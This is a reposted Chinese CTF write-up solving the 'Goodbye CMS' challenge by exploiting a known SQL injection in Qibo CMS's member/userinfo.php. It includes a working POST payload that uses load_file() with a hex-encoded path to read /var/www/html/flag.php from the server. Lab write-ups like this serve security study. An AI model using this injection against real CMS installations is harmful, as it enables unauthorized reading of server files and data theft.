“百度杯”CTF比賽 九月場_再見CMS(齊博cms)


題目在i春秋ctf大本營

又是一道cms的題,打開御劍一通亂掃,發現后台登錄地址,訪問一看妥妥的齊博cms

 

記得以前很久以前利用一個注入通用漏洞,這里我貼上鏈接,里面有原理與利用方法詳細說明:

齊博cms_userinfo注入

 

按照這個思路,我們先在首頁注冊test1賬號並登錄,直接訪問注入的頁面,

先按照之前的套路進行測試:

訪問用戶信息發現成功執行,說明存在注入漏洞:

之前在打開主頁的同時,網頁上也給出了絕對路徑

因為之前的掃描發現根目錄下存在flag.php文件,所以這里應該可以通過注入語句直接讀取該文件:

emmmmmmmm報錯了,看來是搞錯目錄了

重新POST新的路徑:

url:http://6ee916f6234145eea7de5e0ea799d62b5cb205b5bf6c48e2.game.ichunqiu.com/member/userinfo.php?job=edit&step=2

POST:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3%23

這次成功了

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM